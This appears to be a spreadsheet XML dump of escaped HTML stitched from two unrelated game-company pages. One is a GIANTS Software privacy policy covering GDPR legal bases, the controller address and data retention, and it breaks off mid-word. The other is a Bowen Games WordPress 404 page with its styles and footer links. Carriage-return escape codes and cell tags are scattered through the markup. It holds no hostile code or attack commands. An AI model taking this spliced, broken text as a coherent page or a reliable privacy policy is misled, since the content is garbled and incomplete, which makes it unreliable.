        &lt;div class="top-bar"&gt;_x005F_x000D_
            &lt;div class="row column"&gt;_x005F_x000D_
                &lt; div class="top-bar-left"&gt;_x005F_x000D_
                    &lt;a href="index.php?lang=en&amp;country=us" class="logo float-left"&gt;_x005F_x000D_
                        &lt;img src="img/page/logo-main_en.png"&gt;&lt;/a&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                 &lt;div class="top-bar-right"&gt;_x005F_x000D_
                    &lt;ul class="menu float-left"&gt;_x005F_x000D_
                        &lt;</t>
  </si>
  <si>
    <t>li&gt;_x005F_x000D_
                            &lt;a  href="news.php?lang=en&amp;country=us"&gt;BLOG&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a  href="about.php?lang=en&amp;country=us&amp;amp;platform=pc"&gt;GAMES&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a   href="media.php?lang=en&amp;country=us"&gt;MEDIA&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a   href="dlc.php?lang=en&amp;country=us"&gt;DLC&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a   href="mods.php?lang=en&amp;country=us"&gt;MODS&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                        &lt;li&gt;_x005F_x000D_
                            &lt;a class=" highlight-link"  href="newsArticle.php?lang=en&amp;country=us&amp;news_id=280"&gt;TUTORIALS&lt;/a&gt;_x005F_x000D_
                        &lt;/li&gt;_x005F_x000D_
                    &lt;/ul&gt;_x005F_x000D_
                    &lt;a href="buy-now.php?lang=en&amp;country=us&amp;amp;platform=pcdigital" class="button button--buy-now float-right"&gt;BUY NOW&lt;/a&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/header&gt;_x005F_x000D_
    &lt;!-- /Header --&gt;_x005F_x000D_
    &lt;!--End header--&gt;&lt;section class="box-space"&gt;_x005F_x000D_
    &lt;div class="row column"&gt;_x005F_x000D_
		        _</t>
  </si>
  <si>
    <t>x000D_
		&lt;h1  class="title-base" style="width: 100%;"&gt;Privacy Policy&lt;/h1&gt;_x005F_x000D_
			&lt;p&gt; This is the Privacy Policy of GIANTS Software GmbH (“GIANTS”, “we”). We offer information and the opportunity to download electronic games (hereinafter jointly referred to as “Services”) in the Shop section (“Shop”) of our websites (“Website”).</t>
  </si>
  <si>
    <t>This Privacy Policy will inform you about the type of personal data we collect in the context of your use of the Services and about the purpose for which it will be used. It will also inform you about your rights. We take our responsibility for the protection and processing of personal data very seriously.</t>
  </si>
  <si>
    <t>We use a variety of technical means and contractual arrangements to protect your data against unauthorised access and loss. We have implemented the necessary technical and organizational measures. Please note that where links lead to the websites of third parties, those companies provide their own privacy notices which apply to the use of their websites.</t>
  </si>
  <si>
    <t>We only offer our services to individuals who are at least 16 years old. Therefore we do not knowingly collect data from, or process data of, individuals under the age of 16.&lt;/p&gt;_x005F_x000D_
			&lt;h2&gt;I. Name and address of the Controller&lt;/h2&gt;_x005F_x000D_
				&lt;p&gt;The Controller, as this term is defined by the General Data Protection Regulation, other national data protection laws of the Member States, and other data protection regulations, is:&lt;/p&gt;_x005F_x000D_
				&lt;p&gt;GIANTS Software GmbH&lt;br&gt;_x005F_x000D_
				 Wiesenstrasse 19&lt;br&gt;_x005F_x000D_
				8952 Zürich-Schlieren&lt;br&gt;_x005F_x000D_
				Switzerland&lt;/p&gt;_x005F_x000D_
			&lt;h2&gt;II.</t>
  </si>
  <si>
    <t>Name and address of the representative in the European Union&lt;/h2&gt;_x005F_x000D_
				&lt;p&gt;&lt;strong&gt;Jan-Hendrik Pfitzner&lt;/strong&gt;, GIANTS Software GmbH, Wiesenstrasse 19, 8952 Zürich-Schlieren, Switzerland&lt;/p&gt;_x005F_x000D_
			&lt;h2&gt;III. General information on data processing&lt;/h2&gt;_x005F_x000D_
				&lt;h3&gt;1. Scope of personal data processing&lt;/h3&gt;_x005F_x000D_
					&lt;p&gt;As a matter of principle, we only collect the personal data you provide when you use the Services and, as applicable, when you use fee-based services.</t>
  </si>
  <si>
    <t>Personal data is data that contains information on personal or factual circumstances. When you place an order through our website, you are required to provide your name, address, e-mail address and payment information.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt; Sometimes we also need to ask you for personal data like your name, address, e-mail address and telephone number in order to process your inquiries or to provide support to you.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt;</t>
  </si>
  <si>
    <t>In addition, we collect data in the context of a voluntary participation in inquiries and surveys. We only disclose personal data to cooperating companies or external service providers where this is required or permitted by law, in particular for the performance of contracts, for processing payments, for protecting other users, or for the prevention of threats to national or public security, or for the prosecution of criminal offences.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt;Your legitimate interests will be considered in accordance with the statutory data protection regulations.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt; We treat all of this information confidentially and in compliance with the statutory data protection regulations.</t>
  </si>
  <si>
    <t>As a matter of principle, we do not disclose such information to third parties without your consent unless this is required for the performance and execution of the contract, for processing your inquiry, or for providing support services to you, or unless it is permitted pursuant to the statutory data protection regulations.&lt;/p&gt;_x005F_x000D_
				&lt;h3&gt;2. Legal basis for processing personal data&lt;/h3&gt;_x005F_x000D_
					&lt;p&gt;Where we obtain data subjects’ consent for processing operations involving personal data, the processing of personal data is based on Art. 6 (1)(a) of the EU General Data Protection Regulation (GDPR).&lt;/p&gt;_x005F_x000D_
					&lt;p&gt; The legal basis for processing personal data which is necessary for the performance of a contract to which the data subject is a party, is Art. 6 (1)(b) GDPR.</t>
  </si>
  <si>
    <t>This also applies to processing operations that are necessary for taking steps prior to entering into a contract.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt;Where the processing of personal data is necessary to comply with a legal obligation to which our company is subject, processing is based on Art. 6 (1)(c) GDPR.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt; In the event that personal data needs to be processed in order to protect the vital interests of the data subject or another natural person, processing is based on Art. 6 (1)(d) GDPR.&lt;/p&gt;_x005F_x000D_
					&lt;p&gt;If the processing is necessary to protect a legitimate interest of our company or a third party and the interests or the fundamental rights and freedoms of the data subject do not override that legitimate interest, processing is based on Art. 6 (1)(f) GDPR.&lt;/p&gt;_x005F_x000D_
				&lt;h3&gt;3.</t>
  </si>
  <si>
    <t>Purpose of personal data processing&lt;/h3&gt;_x005F_x000D_
					&lt;p&gt;We collect and process data in order to enable your use of the services. This also includes processing personal data for the purpose of data security, the stability and operational safety of our system, and for billing purposes. We process data in order to assist you with support inquiries.</t>
  </si>
  <si>
    <t>Data is also processed to detect and prevent a misuse of the Services, e.g. a use for fraudulent purposes. Data is processed to acquire new customers and to present advertising that we believe matches your interests.&lt;/p&gt;_x005F_x000D_
				&lt;h3&gt;4. Erasure of data and storage period&lt;/h3&gt;_x005F_x000D_
					&lt;p&gt;</t>
  </si>
  <si>
    <t>The personal data of data subjects is erased or blocked when the purpose of storing it no longer exists. Data can also be stored beyond such time if the European or national legislator provided for this in Union law regulations, laws or other legal regulations to which the Controller is subject. Data is also blocked or erased when a storage period required by the aforementioned regulations expires unless data needs to be stored beyond such time in order to execute or perform a contract.&lt;/p&gt;_x005F_x000D_
				&lt;h3&gt;5.</t>
  </si>
  <si>
    <t>Data security&lt;/h3&gt;_x005F_x000D_
					&lt;p&gt; We have taken the steps that can reasonably be expected of us to prevent unauthorised access to your p</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;_x005F_x000D_
		&lt;html lang="en-US"&gt;_x005F_x000D_
		_x005F_x000D_
	&lt;head&gt;_x005F_x000D_
_x005F_x000D_
				&lt;meta charset="UTF-8"&gt;_x005F_x000D_
		&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;_x005F_x000D_
		&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;_x005F_x000D_
		_ x000D_
		&lt;title&gt;Page not found &amp;#8211; Bowen Games&lt;/title&gt;
&lt;link rel='dns-prefetch' href='//www.bowengames.com' /&gt;
&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;
&lt;link rel='dns-prefetch' href='//s.w.org' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Bowen Games &amp;raquo; Feed" href="https://www.bowengames.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Bowen Games &amp;raquo; Comments Feed" href="https://www.bowengames.com/comments/feed/" /&gt;
		&lt;script type="text/javascript"&gt;
			 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.bowengames.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.14"}};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[55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}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</si>
  <si>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 important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel='stylesheet' id='wp-block-library-css'  href='https://www.bowengames.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.14' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='dashicons-css'  href='https://www.bowengames.com/wp-includes/css/dashicons.min.css?ver=5.3.14' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='everest-forms-general-css'  href='https://www.bowengames.com/wp-content/plugins/everest-forms/assets/css/everest-forms.css?ver=1.7.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='social-icons-general-css'  href='//www.bowengames.com/wp-content/plugins/social-icons/assets/css/social-icons.css?ver=1.7.2' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css'  href='https://www.bowengames.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='zakra-style-css'  href='https://www.bowengames.com/wp-content/themes/zakra/style.css?ver=5.3.14' type='text/css' media='all' /&gt;
&lt;style id='zakra-style-inline-css' type='text/css'&gt;
.tg-site-header .tg-site-header-top{color: rgba(255,255,255,0);}.tg-site-header .tg-site-header-top{background-color: #dd9933;background-image: ;background-repeat: repeat;background-position: center center;background-size: contain;background-attachment: scroll;}
.tg-site-header{border-bottom-width: 0px;}
.tg-primary-menu &gt; div &gt; ul li:not(.tg-header-button-wrap) a{color: #dd9933;}.tg-primary-menu &gt; div &gt; ul li:not(.tg-header-button-wrap):hover &gt; a{color: #1e73be;}.tg-primary-menu &gt; div ul li:active &gt; a, .tg-primary-menu &gt; div ul &gt; li:not(.tg-header-button-wrap).current_page_item &gt;</t>
  </si>
  <si>
    <t>a, .tg-primary-menu &gt; div ul &gt; li:not(.tg-header-button-wrap).current-menu-item &gt; a{color: #1e73be;}.tg-primary-menu.tg-primary-menu--style-underline &gt; div ul &gt; li:not(.tg-header-button-wrap).current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-underline &gt; div ul &gt; li:not(.tg-header-button-wrap).current-menu-item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-left-border &gt; div ul &gt; li:not(.tg-header-button-wrap).current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-left-border &gt; div ul &gt; li:not(.tg-header-button-wrap).current-menu-item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-right-border &gt; div ul &gt; li:not(.tg-header-button-wrap).current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-right-border &gt; div ul &gt; li:not(.tg-header-button-wrap).current-menu-item &gt; a::before{background-color: #1e73be;}
a:hover, a:focus,  .tg-primary-menu &gt; div ul li:hover &gt; a,  .tg-primary-menu &gt; div ul li.current_page_item &gt; a, .tg-primary-menu &gt; div ul li.current-menu-item &gt; a,  .tg-mobile-navigation &gt; div ul li.current_page_item &gt; a, .tg-mobile-navigation &gt; div ul li.current-menu-item &gt; a,  .entry-content a,  .tg-meta-style-two .entry-meta span, .tg-meta-style-two .entry-meta a{color: #1e73be;}.tg-primary-menu.tg-primary-menu--style-underline &gt;</t>
  </si>
  <si>
    <t>div &gt; ul &gt; li.current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-underline &gt; div &gt; ul &gt; li.current-menu-item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-left-border &gt; div &gt; ul &gt; li.current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-left-border &gt; div &gt; ul &gt; li.current-menu-item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-right-border &gt; div &gt; ul &gt; li.current_page_item &gt; a::before, .tg-primary-menu.tg-primary-menu--style-right-border &gt; div &gt; ul &gt; li.current-menu-item &gt; a::before, .tg-scroll-to-top:hover, button, input[type="button"], input[type="reset"], input[type="submit"], .tg-primary-menu &gt; div ul li.tg-header-button-wrap a{background-color: #1e73be;}body{color: #dd9933;}
button, input[type="button"], input[type="reset"], input[type="submit"]{background-color: #16181a;}button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover{background-color: #4286f5;}
.entry-content a:hover, .entry-content a:focus{color: #4286f5;}
.tg-site-footer .tg-site-footer-bar{color: #ffffff;}.tg-site-footer .tg-site-footer-bar a{color: #ffffff;}.tg-site-footer .tg-site-footer-bar a:hover, .tg-site-footer .tg-site-footer-bar a:focus{color: #4286f5;}.tg-site-footer .tg-site-footer-bar{border-top-width: 1px;}.tg-site-footer .tg-site-footer-bar{border-top-color: rgba(255,255,255,0.12);}.tg-site-footer .tg-site-footer-bar{background-color: #16181a;background-image: ;background-repeat: repeat;background-position: center center;background-size: contain;background-attachment: scroll;}
.tg-site-footer-widgets{background-color: #16181a;background-image: ;background-repeat: repeat;background-position: center center;background-size: contain;background-attachment: scroll;}.tg-site-footer .tg-site-footer-widgets{border-top-width: 0px;}.tg-site-footer .tg-site-footer-widgets .widget-title{color: #ffffff;}.tg-site-footer .tg-site-footer-widgets, .tg-site-footer .tg-site-footer-widgets p{color: #ffffff;}.tg-site-footer .tg-site-footer-widgets a{color: #ffffff;}.tg-site-footer .tg-site-footer-widgets a:hover, .tg-site-footer .tg-site-footer-widgets a:focus{color: #4286f5;}.tg-site-footer .tg-site-footer-widgets ul li{border-bottom-width: 0px;}
.tg-scroll-to-top{color: #dd9933;}.tg-scroll-to-top:hover{color: #dd9933;}.tg-scroll-to-top{background-color: #3e4232;}.tg-scroll-to-top.tg-scroll-to-top--show:hover{background-color: #4286f5;}
body{font-family: Lato;font-size: 15px;line-height: 1.8;font-weight: 400;font-style: normal;}h1, h2, h3, h4, h5, h6{font-family: Inconsolata;line-height: 1.3;font-weight: 400;font-style: normal;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='zakra-googlefonts-css'  href='//fonts.googleapis.com/css?family=Lato%3A400%7CInconsolata%3A400&amp;#038;ver=5.3.14' type='text/css' media='all' /&gt;
&lt;link rel='https://api.w.org/' href='https://www.bowengames.com/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.bowengames.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.bowengames.com/wp-includes/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 5.3.14" /&gt;
&lt;meta name="generator" content="Everest Forms 1.7.2" /&gt;
		&lt;style type="text/css"&gt;_x005F_x000D_
						.site-title,_x005F_x000D_
			.site-description {_x005F_x000D_
				position: absolute;_x005F_x000D_
				clip: rect(1px, 1px, 1px, 1px);_x005F_x000D_
			}_x005F_x000D_
_x005F_x000D_
					&lt;/style&gt;_x005F_x000D_
		&lt;link rel="icon" href="https://www.bowengames.com/wp-content/uploads/2019/11/cropped-bowengames-32x32.png" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://www.bowengames.com/wp-content/uploads/2019/11/cropped-bowengames-192x192.png" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon-precomposed" href="https://www.bowengames.com/wp-content/uploads/2019/11/cropped-bowengames-180x180.png" /&gt;
&lt;meta name="msapplication-TileImage" content="https://www.bowengames.com/wp-content/uploads/2019/11/cropped-bowengames-270x270.png" /&gt;
_x005F_x000D_
	&lt;/head&gt;_x005F_x000D_
_x005F_x000D_
&lt;body data-rsssl=1 class="error404 wp-custom-logo everest-forms-no-js hfeed tg-site-layout--right tg-container--wide elementor-default"&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;div id="page" class="site tg-site"&gt;_x005F_x000D_
				&lt;a class="skip-link screen-reader-text" href="#content"&gt;Skip to content&lt;/a&gt;_x005F_x000D_
		_x005F_x000D_
_x005F_x000D_
	&lt;header id="masthead" class="site-header tg-site-header tg-site-header--left"&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
		&lt;div class="tg-site-header-top"&gt;_x005F_x000D_
			&lt;div class="tg-header-container tg-container tg-container--flex tg-container--flex-center"&gt;_x005F_x000D_
				&lt;div class="tg-header-top-left-content"&gt;_x005F_x000D_
_x005F_x000D_
					_</t>
  </si>
  <si>
    <t>x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!-- /.tg-header-top-left-content --&gt;_x005F_x000D_
				&lt;div class="tg-header-top-right-content"&gt;_x005F_x000D_
_x005F_x000D_
					_ x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!-- /.tg-header-top-right-content --&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
			&lt;!-- /.tg-container --&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;!-- /.tg-site-header-top --&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
_ x000D_
	&lt;div class="tg-site-header-bottom"&gt;_x005F_x000D_
	&lt;div class="tg-header-container tg-container tg-container--flex tg-container--flex-center tg-container--flex-space-between"&gt;_x005F_x000D_
_x005F_x000D_
		_</t>
  </si>
  <si>
    <t>x000D_
		&lt;div class="site-branding"&gt;_x005F_x000D_
			&lt;a href="https://www.bowengames.com/" class="custom-logo-link" rel="home"&gt;&lt;img width="275" height="106" src="https://www.bowengames.com/wp-content/uploads/2019/11/cropped-bowengamestiny.png" class="custom-logo" alt="Bowen Games" /&gt;&lt;/a&gt;			&lt;div class="site-info-wrap"&gt;_x005F_x000D_
									&lt;p class="site-title"&gt;_x005F_x000D_
						&lt;a href="https://www.bowengames.com/" rel="home"&gt;Bowen Games&lt;/a&gt;_x005F_x000D_
					&lt;/p&gt;_x005F_x000D_
										&lt;p class="site-description"&gt;Mobile Simulation Games&lt;/p&gt;_x005F_x000D_
							&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
		&lt;/div&gt;&lt;!-- .site-branding --&gt;_x005F_x000D_
				&lt;nav id="site-navigation" class="main-navigation tg-primary-menu tg-primary-menu--style-underline"&gt;_x005F_x000D_
				&lt;div class="menu"&gt;&lt;ul id="primary-menu" class="menu-primary"&gt;&lt;li id="menu-item-476" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-476"&gt;&lt;a href="https://www.bowengames.com/about-us/"&gt;Company&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-796" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-796"&gt;&lt;a href="https://www.bowengames.com/mobilegames/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-489" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-489"&gt;&lt;a href="https://www.bowengames.com/team/"&gt;Team&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-805" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-805"&gt;&lt;a href="https://www.bowengames.com/contact-2/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;		&lt;/nav&gt;&lt;!--</t>
  </si>
  <si>
    <t>#site-navigation --&gt;_x005F_x000D_
				&lt;nav id="header-action" class="tg-header-action"&gt;_x005F_x000D_
			&lt;ul class="tg-header-action-list"&gt;_x005F_x000D_
_x005F_x000D_
				&lt;li class="tg-header-action__item tg-mobile-toggle" &gt;_x005F_x000D_
										&lt;i class="tg-icon tg-icon-bars"&gt;&lt;/i&gt;_x005F_x000D_
				&lt;/li&gt;_x005F_x000D_
				&lt;!-- /.tg-mobile-toggle --&gt;_x005F_x000D_
			&lt;/ul&gt;_x005F_x000D_
			&lt;!-- /.zakra-header-action-list --&gt;_x005F_x000D_
		&lt;/nav&gt;&lt;!-- #header-action --&gt;_x005F_x000D_
				_ x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;!-- /.tg-container --&gt;_x005F_x000D_
	&lt;/div&gt;_x005F_x000D_
	&lt;!-- /.tg-site-header-bottom --&gt;_x005F_x000D_
		_</t>
  </si>
  <si>
    <t>x000D_
	&lt;/header&gt;&lt;!-- #masthead --&gt;_x005F_x000D_
		_ x000D_
	&lt;main id="main" class="site-main"&gt;_x005F_x000D_
				&lt;div id="content" class="site-content"&gt;_x005F_x000D_
			&lt;div class="tg-container tg-container--flex tg-container--flex-space-between"&gt;_x005F_x000D_
		_x005F_x000D_
	&lt;div id="primary" class="content-area"&gt;_x005F_x000D_
		_x005F_x000D_
		&lt;section class="error-404 not-found"&gt;_x005F_x000D_
			&lt;header class="page-header"&gt;_x005F_x000D_
								&lt;h1 class="page-title tg-page-content__title"&gt;Oops!</t>
  </si>
  <si>
    <t>That page can&amp;rsquo;t be found.&lt;/h1&gt;_x005F_x000D_
						&lt;/header&gt;&lt;!-- .page-header --&gt;_x005F_x000D_
_x005F_x000D_
			&lt;div class="page-content"&gt;_x005F_x000D_
				&lt;p&gt; It looks like nothing was found at this location. Maybe try one of the links below or a search?&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
				&lt;form role="search" method="get" class="search-form" action="https://www.bowengames.com/"&gt;
				&lt;label&gt;
					&lt;span class="screen-reader-text"&gt;Search for:&lt;/span&gt;
					&lt;input type="search" class="search-field" placeholder="Search &amp;hellip;" value="" name="s" /&gt;
				&lt;/label&gt;
				&lt;input type="submit" class="search-submit" value="Search" /&gt;
			&lt;/form&gt;			&lt;/div&gt;&lt;!-- .page-content --&gt;_x005F_x000D_
		&lt;/section&gt;&lt;!-- .error-404 --&gt;_x005F_x000D_
_x005F_x000D_
			&lt;/div&gt;&lt;!--</t>
  </si>
  <si>
    <t>#primary --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
		&lt;!-- /.tg-container--&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;!-- /#content--&gt;_x005F_x000D_
				&lt;/main&gt;&lt;!-- /#main --&gt;_x005F_x000D_
		_x005F_x000D_
			&lt;footer id="colophon" class="site-footer tg-site-footer "&gt;_x005F_x000D_
		_x005F_x000D_
		_x005F_x000D_
		&lt;div class="tg-site-footer-widgets"&gt;_x005F_x000D_
			&lt;div class="tg-container"&gt;_x005F_x000D_
				_x005F_x000D_
&lt;div class="tg-footer-widget-container tg-footer-widget-col--four"&gt;_x005F_x000D_
					&lt;div class="tg-footer-widget-area footer-sidebar-1"&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
								&lt;div class="tg-footer-widget-area footer-sidebar-2"&gt;_x005F_x000D_
											&lt;section id="themegrill_social_icons-5" class="widget social-icons widget_social_icons"&gt;		
		&lt;ul class="social-icons-lists icons-background-rounded centre"&gt;
				&lt;li class="social-icons-list-item"&gt;
					&lt;a href="https://www.facebook.com/bowengamesllc/" target="_blank"  class="social-icon"&gt;
						&lt;span class="socicon socicon-facebook" style="padding: 20px; font-size: 18px; background-color: #3e5b98"&gt;&lt;/span&gt;
											&lt;/a&gt;
				&lt;/li&gt;
				&lt;li class="social-icons-list-item"&gt;
					&lt;a href="https://www.youtube.com/user/mbowen89/featured" target="_blank"  class="social-icon"&gt;
						&lt;span class="socicon socicon-youtube" style="padding: 20px; font-size: 18px; background-color:</t>
  </si>
  <si>
    <t>#e02a20"&gt;&lt;/span&gt;
											&lt;/a&gt;
				&lt;/li&gt;
				&lt;li class="social-icons-list-item"&gt;
					&lt;a href="https://play.google.com/store/apps/dev?id=6833224340303003178&amp;#038;hl=en_CA" target="_blank"  class="social-icon"&gt;
						&lt;span class="socicon socicon-play" style="padding: 20px; font-size: 18px; background-color: #000000"&gt;&lt;/span&gt;
											&lt;/a&gt;
				&lt;/li&gt;
				&lt;li class="social-icons-list-item"&gt;
					&lt;a href="https://www.amazon.com/s?rh=n%3A2350149011%2Cp_4%3ABowen+Games+LLC&amp;#038;ref=bl_dp_s_web_0" target="_blank"  class="social-icon"&gt;
						&lt;span class="socicon socicon-amazon" style="padding: 20px; font-size: 18px; background-color: #ff9900"&gt;&lt;/span&gt;
											&lt;/a&gt;
				&lt;/li&gt;
				&lt;li class="social-icons-list-item"&gt;
					&lt;a href="https://apps.apple.com/us/developer/bowen-games-llc/id785904638" target="_blank"  class="social-icon"&gt;
						&lt;span class="socicon socicon-apple" style="padding: 20px; font-size: 18px; background-color: #b9bfc1"&gt;&lt;/span&gt;
											&lt;/a&gt;
				&lt;/li&gt;
		&lt;/ul&gt;
		&lt;/section&gt;									&lt;/div&gt;_x005F_x000D_
								&lt;div class="tg-footer-widget-area footer-sidebar-3"&gt;_x005F_x000D_
											&lt;section id="nav_menu-7" class="widget widget_nav_menu"&gt;&lt;div class="menu-footer-menu-container"&gt;&lt;ul id="menu-footer-menu" class="menu"&gt;&lt;li id="menu-item-856" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-856"&gt;&lt;a href="https://www.bowengames.com/contact-2/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-774" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-774"&gt;&lt;a href="https://www.bowengames.com/privacy-policy/"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-857"&gt;&lt;a href="https://www.bowengames.com/mobilegames/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-775" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-775"&gt;&lt;a href="https://www.bowengames.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;/section&gt;									&lt;/div&gt;_x005F_x000D_
								&lt;div class="tg-footer-widget-area footer-sidebar-4"&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
				&lt;/div&gt; &lt;!-- footer-widgets --&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
			&lt;!-- /.tg-container--&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;!-- /.tg-site-footer-widgets --&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
		_x005F_x000D_
		&lt;div class="tg-site-footer-bar tg-site-footer-bar--center"&gt;_x005F_x000D_
			&lt;div class="tg-container tg-container--flex tg-container--flex-top"&gt;_x005F_x000D_
				&lt;div class="tg-site-footer-section-1"&gt;_x005F_x000D_
_x005F_x000D_
					&lt;p&gt;</t>
  </si>
  <si>
    <t>Copyright © 2019 Bowen Games.  &lt;/p&gt;_x005F_x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!-- /.tg-site-footer-section-1 --&gt;_x005F_x000D_
_x005F_x000D_
				&lt;div class="tg-site-footer-section-2"&gt;_x005F_x000D_
_x005F_x000D_
					_ x000D_
				&lt;/div&gt;_x005F_x000D_
				&lt;!-- /.tg-site-footer-section-2 --&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
			&lt;!-- /.tg-container--&gt;_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;!-- /.tg-site-footer-bar --&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
			&lt;/footer&gt;&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">#colophon --&gt;_x005F_x000D_
		_x005F_x000D_
		&lt;/div&gt;&lt;!-- #page --&gt;_x005F_x000D_
				&lt;nav id="mobile-navigation" class="tg-mobile-navigation"_x005F_x000D_
			&gt;_x005F_x000D_
_x005F_x000D_
			&lt;div class="menu-primary-menu-container"&gt;&lt;ul id="mobile-primary-menu" class="menu"&gt;&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-476"&gt;&lt;a href="https://www.bowengames.com/about-us/"&gt;Company&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-796"&gt;&lt;a href="https://www.bowengames.com/mobilegames/"&gt;Games&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-489"&gt;&lt;a href="https://www.bowengames.com/team/"&gt;Team&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-805"&gt;&lt;a href="https://www.bowengames.com/contact-2/"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;_x005F_x000D_
		&lt;/nav&gt;&lt;!-- /#mobile-navigation--&gt;_x005F_x000D_
		_x005F_x000D_
		&lt;a href="" id="tg-scroll-to-top" class="tg-scroll-to-top"&gt;_x005F_x000D_
